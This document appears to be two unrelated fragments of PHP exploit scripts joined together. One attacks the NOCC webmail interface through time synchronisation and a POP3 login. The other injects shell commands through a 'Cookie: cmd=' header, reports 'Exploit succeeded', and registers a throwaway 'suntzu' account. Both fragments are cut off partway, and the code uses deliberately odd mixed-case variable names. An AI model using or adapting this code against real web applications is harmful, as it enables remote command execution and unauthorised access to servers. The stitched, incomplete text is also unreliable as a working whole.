//syncrhonize with remote tArGeT Unin epoch time by Apache "Date:" response header //it carries GMT time... sending two HEAD requests, one to target, one to yourself if (eregi("Date: ", $HtMl)) { $pAcKeT = "HEAD / HTTP/1.1\r\nhOsT: " . $hOsT . "\r\nConnection: Close\r\n\r\n"; sendpAcKeTii($pAcKeT); $itstime = greenwich_timestamp($HtMl); echo "tArGeT hOsT greenwich timestamp: " . $itstime . "<br>"; $pAcKeT = str_replace($hOsT, $_SERVER[SERVER_NAME], $pAcKeT); $fp = fsockopen($_SERVER[SERVER_NAME], $_SERVER[SERVER_PORT]); fputs($fp, $pAcKeT); $out = ''; while (!feof($fp)) { $out .= fgets($fp); } fclose($fp); $mytime = greenwich_timestamp($out); echo "my greenwich timestamp: " . $mytime . "<br>"; $difftime = $itstime - $mytime; echo "difftime: " . $difftime . "<br>"; } #STEP 1 -> Login to a POP3 server that you choose to have access on NOCC interface $dAtA = "user="******"&domainnum=0"; $dAtA .= "&passwd=" . $PASSWD; $dAtA .= "&server=" . $POP3_SERVER; $dAtA .= "&port=110"; $dAtA .= "&servtype=pop3"; $dAtA .= "&lang=en"; $dAtA .= "&theme=standard"; $dAtA .= "&enter=Ok"; $pAcKeT = "POST " . $p . "action.php HTTP/1.1\r\n";
$packet .= "Cookie: cmd=" . $cmd . ";\r\n"; $packet .= "Connection: Close\r\n\r\n"; sendpacketii($packet); if (strstr($html, "56789")) { echo "Exploit succeeded..."; $temp = explode("56789", $html); die("\r\n" . $temp[1] . "\r\n"); } echo "step 0b -> Synchronize...\r\n"; $difftime = 0; //Unin epoch time by Apache "Date:" response header //it carries GMT time... sending HEAD request $packet = "HEAD / HTTP/1.1\r\nHost: " . $host . "\r\nConnection: Close\r\n\r\n"; sendpacketii($packet); if (eregi("Date: ", $html) and $proxy == '') { $itstime = greenwich_timestamp($html); echo "target host Greenwich timestamp: " . $itstime . "\r\n"; $mytime = gmtime(); echo "my greenwich timestamp: " . $mytime . "\r\n"; $difftime = $itstime - $mytime; echo "difftime: " . $difftime . "\r\n"; } else { echo "Unable to read \"Date\", assuming difftime = 0\r\n"; } echo "step 1 -> Register...\r\n"; srand(make_seed()); $anumber = rand(1, 99999); $data = "name=suntzu" . $anumber; $data .= "&pass=suntzu"; $data .= "&pass2=suntzu"; $data .= "&email=suntzu" . $anumber . "%40fakemail.com";